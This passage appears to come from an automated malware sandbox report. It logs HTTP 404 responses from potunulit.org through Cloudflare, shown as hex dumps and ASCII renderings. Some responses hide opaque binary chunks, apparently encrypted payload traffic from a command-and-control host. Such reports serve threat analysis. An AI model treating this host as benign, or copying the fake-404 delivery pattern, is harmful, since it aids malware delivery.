0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 70 6f 74 75 6e 75 6c 69 74 2e 6f 72 67 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not 
Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at potunulit.org Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 07 Feb 2023 18:44:47 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=zgAw%2BlUJztsSJARnRnHkwWF6t4U9iHjagH3QHSkLoWQoL9%2BsGIpwOqLjvmt1xuvJ%2FjFJ3iry%2FRsccu5h7eAhQ1A%2FtuUh5m3ZGNCPSxPBeQcDK2GyjGqgPRaJGtR1Jfg7"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 795e47655a9235fd-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 37 64 37 35 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 fd 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 ce f5 ee 60 d7 6a f8 09 7b 3a 03 c5 a7 a9 df 06 3c 3b 7c 27 52 97 32 0f af 8f e0 84 e3 59 d9 c6 a7 c0 e2 b0 2a 71 bd b1 dc 86 55 c9 8a 5b bb 0b 47 1e d7 8a 65 08 d7 dd 65 bb 14 28 86 d0 31 b6 5e 60 28 53 9d 98 a7 a0 36 f8 37 33 ac 3b f3 25 ed 05 70 b1 17 22 58 4a 33 4f 62 3e 15 21 0b 5a f3 43 93 3a 1a 3e cf 00 a4 7d 9d 74 d7 07 53 53 fa cb 1f 9e fd 09 50 2a ee 8c 8a 7b 7e c9 f6 ff 78 bb 49 db c4 0d 13 13 d9 67 e1 92 24 18 4f c5 03 01 ca a1 61 7e 9e f5 69 a9 19 17 7e 5d af 9a a0 44 c9 a0 c1 b9 dd 7a 08 90 4e 19 e0 2c 95 a9 18 fa e8 96 be 21 51 61 d8 0b 35 7c 8a 28 c8 c9 6b a1 d0 4a 9a 13 fd ec 9e aa 6b ac 87 3f bd 61 0d c0 5d bf 56 34 fd f8 12 6c 33 6c 29 7c 0a 8d 7b 72 e5 0e f4 eb 7e 71 eb 10 e8 1a b8 84 4a d8 19 ae cc 4f 3b 79 82 ae 9c 97 02 4c 75 56 ad f3 57 8b 37 b9 36 e1 cc 23 e2 67 0e 31 65 92 90 f7 df f5 ec e7 72 2b 4c 80 d0 12 f9 13 63 11 bb d6 af 31 3c 27 d4 69 b7 9f 23 f6 cc 46 99 48 15 ac af eb d9 55 3d af ba 68 92 1e ff 9d 7f 
7d 55 40 57 64 7b 39 66 e7 ac 04 28 84 42 40 77 9b c7 9b 84 e7 3d 66 f1 8a 64 b1 33 44 77 29 f8 70 17 4b 41 e0 de 8e 82 11 e8 e4 1f d2 a0 90 4e a5 54 55 a5 8e b7 1b 6f c3 cb 29 32 28 e7 5b 3e 54 ab 7e 08 19 70 9a a2 ce 57 a3 7c fb 9e 1f d4 fc 69 91 9c 03 0f f1 2c ce af 03 5b e5 1f e4 a6 7d 10 9f 10 b9 d9 b0 d9 07 99 4a e3 96 0c 06 1a 50 6d 43 1c a6 8b 8b e1 f2 67 d7 9c a8 c3 e0 2b 13 be bb 01 7a 17 28 d2 ae 46 1f d0 a1 aa 7a cf f6 6b a3 e3 a2 bc 5b 6f e3 e3 1c 65 0c f5 52 48 74 27 96 4d e5 e7 17 3f 06 ef 7e 4d a6 70 d4 03 eb ac 98 76 6e 0f ca c2 cf 25 6c 9f 96 ce ec 35 98 c3 a7 0d a8 ca d4 5f 29 43 43 9c 55 03 62 18 3a 1d f8 40 aa ae 88 c1 c4 a1 33 25 7d da a9 c3 e8 Data Ascii: 7d75`@0,xO}q4 IJ%9Wd8IkDJ8P>%y^\.Kij}S.;vKs6(p_6k)|p|t]ShG*`j{:<;|'R2Y*qU[Gee(1^`(S673;%p"XJ3Ob>!ZC:>}tSSP*{~xIg$Oa~i~]DzN,!Qa5|(kJ
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 07 Feb 2023 18:44:49 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Q2CqCppgNg5u4Kzx7p9ljU8Xm78OHNBFBvb%2F7GbqAQ6NigIH4oN1ra6uQsuHaukr5bFVzWTQtKVJtNGRRTk6ZBGQ%2FYFEo4opTItOfBuHGa2J0HwT3QgsMNvI6NOeSaSo"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 795e476fd9f635fd-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 70 6f 74 75 6e 75 6c 69 74 2e 6f 72 67 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not 
Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at potunulit.org Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 07 Feb 2023 18:44:50 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=GbB0KSV9wS5oX3hByXp%2BXlDv54KVM8z3ecIfhU1SZ2ioZz90RifupIcYrso77dZcMJ918Io3UPKlCmn0jFnd9sK6J5clO2aCvztTtJVdTLGb3YbW%2FDRvcOvPz0gGDUhT"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 795e47745fe335fd-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 70 6f 74 75 6e 75 6c 69 74 2e 6f 72 67 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not 
Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at potunulit.org Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 07 Feb 2023 18:44:50 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=KkiFYnKblfQoC%2B0iGgeBn5qKvhOh5uuuZUzvN%2FWITdd%2FUMiRFSnKB1G%2B959dBuZ%2FdCzVL%2FNzLRdCSfzHBtmDGrzDVJLBU3gHW2kr%2FSY94uxBRD4uTniY%2BdK3yeScsZXG"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 795e4774e8cc35fd-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 70 6f 74 75 6e 75 6c 69 74 2e 6f 72 67 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not 
Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at potunulit.org Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 07 Feb 2023 18:44:50 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=3javejhj1Wg33ArssltZOCA%2B0EzP3KzCIiiR3%2FPFKhBFxt3lkdRhSziou1Meo%2BdK1Cxfb4NXGJBVuhV2NLvsFj36OU%2F6ZNsjxFgMxTRwexHU6EsGKWijQKRRPfijuwr9"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 795e477599cc35fd-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 32 63 0d 0a 00 00 b5 55 08 b5 79 73 2f 7e 28 10 e8 c3 a7 f7 be 60 3a 4a c2 5f 86 07 9c a7 53 f7 67 a3 7d 0a 55 3b e0 64 55 35 df 0b 67 0e 61 d4 0d 0a Data Ascii: 2cUys/~(`:J_Sg}U;dU5ga
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 07 Feb 2023 18:45:01 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=2ySOOfglmvxceTjMZBhxpmfe6ZoC1gLA6qqaJrdXfjNQvZjYy%2FF1wrGpGPvY3vfyIcYBZIDF%2BBH2bfYlzcSMF39Vwcrn7No2%2FC052zj89oy5zfhx8ArQ9YXEufLe4Txb"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 795e47baa92f90d6-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 70 6f 74 75 6e 75 6c 69 74 2e 6f 72 67 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not 
Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at potunulit.org Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 07 Feb 2023 18:45:01 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=PRFhKQXktepOXkOboyM7pomKXHvtbfN0ONIioaEGgYccDJ0B02EQBbZgaaLYg2XH99yXHF5LAnaj40lqDIH3XecNMupylSXxT6hXbhesaRVEcItaGiIk7Ny8Q%2FDC7M9S"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 795e47bbfa7190d6-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 33 37 61 65 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 9d 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 8b bf 6a c6 e2 82 1a fc 15 6f 36 53 f6 c7 35 f3 73 07 03 d2 ef f9 fb fa eb b1 87 6c cd fb 3d 33 d1 b0 77 45 7c 1f 57 44 94 68 84 3c 50 25 51 fe 08 22 b9 3f 19 66 3d 28 2a 97 6a dd d6 bc db 43 17 5c 53 a6 cd f6 4d 55 62 91 54 5b fd 55 19 d0 ed 05 12 b1 17 26 58 4a 33 4f 62 3e 17 21 2b da a3 06 83 3a 56 3f cb 00 23 ae 42 15 d7 07 53 53 fa cb 0f 9e 1d 09 52 2b e5 9d 83 7b 7e 45 f7 ff 78 8d 55 db d4 0d 13 13 bf 1e e1 92 24 08 4f c5 db b0 e6 a1 05 7e de f5 69 49 78 17 ab 5e af 9a 25 1a a8 a0 35 30 dd 7a 0d 90 4e 19 e0 2c 95 a9 18 1a f5 96 be 25 51 61 9a d4 3e 7c 88 28 c8 48 6b a1 c0 4a 9a 03 fd ec 9e aa 7b ac 87 2f bd 61 35 36 76 bf 76 34 fd f8 52 31 52 6c 11 7d 0a 8d c7 fd e4 0e a4 eb 7e 71 eb 00 db 1a c8 9b 4a d8 19 ae cc 4f 3b 79 82 ae 9c 97 02 4c 75 56 ad f3 57 3b 2a b9 72 ee cc 23 9c 01 6b 49 0d 92 90 f7 8f 3e e2 e7 72 3b 4c 80 d0 12 f9 13 63 11 bb d6 af 31 3c 27 d4 69 b7 9f 33 c9 cc 46 f9 48 15 cc 81 99 bd 34 49 ce ba 68 f0 9c fc 9d 7f 9f 5b 40 
57 64 7b 39 66 e7 ac 04 28 84 42 40 77 9b c7 9b 84 e7 3d 66 b1 8a 64 f1 33 54 73 25 ed 70 17 4b 5d fc df 8e 82 81 fa e4 1f 5e a1 90 4e a1 54 55 a5 8e b7 1b 6f c3 cb 29 32 28 e7 5b 5e 54 ab de 08 0d 75 8f b7 af 57 a3 a0 98 85 1f d4 7c 7b 91 9c 29 06 f1 2c 5e ae 03 5b e5 1f e4 a6 7d 10 9f 10 b9 d9 b0 d9 07 99 ca 92 b6 3b 35 2d 11 6d 43 38 b9 8b 8b e1 d2 69 d7 9c 88 c3 e0 2b a9 b4 bb 01 7a 17 28 d2 ae 46 1f d0 a1 aa 7a cf f6 6b a3 e3 a6 b4 47 30 80 e3 1c e9 74 e3 52 48 04 29 96 4d cb e7 17 3f dc e5 7e 4d a6 70 d4 03 eb ac 98 76 6e 0f ca e2 cf 25 4e b1 e0 a3 9c 04 98 c3 a7 79 60 fd d4 5f 09 69 43 9c 9f 34 62 18 3e 1d f8 40 aa ae 88 c1 c4 a1 33 25 7d da a9 a3 e8 c8 47 e5 90 7a 9a e8 23 Data Ascii: 37ae`@0,xO}q4 IJ%9Wd8IkDJ8P>%y^\.Kij}S.;vKs6(p_6k)|p|t]ShG*jo6S5sl=3wE|WDh<P%Q"?f=(*jC\SMUbT[U&XJ3Ob>!+:V?#BSSR+{~ExU$O~iIx^%50zN,%Qa
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 07 Feb 2023 18:45:03 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ZhVv9Hbs0Pu35ErVgIejY8akgvHGK9Z5epV68O699U83p3C0e0Gm4gWpMz0SQFKFYjU%2FsIo3X5T1eoHH5m15EYivk%2FCa8yLlMQlRlb27%2Fp6AHfv2Igzyua8nfqqXMQHi"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 795e47c938e690d6-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 70 6f 74 75 6e 75 6c 69 74 2e 6f 72 67 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not 
Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at potunulit.org Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 07 Feb 2023 18:45:03 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=XFK0QKkaa4pr36dTOcr1JvoLNkyph%2F8OC1pg6%2BqgaCfB%2B0jrtaV6xW2LoyPBDImuhA3oJ7pBjTCTWNJlQVpZx%2BjEc%2BSjaHtQviIUp7I6rxwKhVTncFPs0157is082Oyk"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 795e47c9b98590d6-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 07 Feb 2023 18:45:05 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=OZ%2FjPrkqtcdSScC3gxiCqGcm2tLdo3QsuXe%2F339%2F2pwMU5tF1ETm1xJHfqtWOv%2FfOLpTc6pHJDADwehjyvj3ScvI4G58UhwwUhm8Gzeb6rFywVLsdIxilctHDBZYsvsJ"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 795e47d54d30368c-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 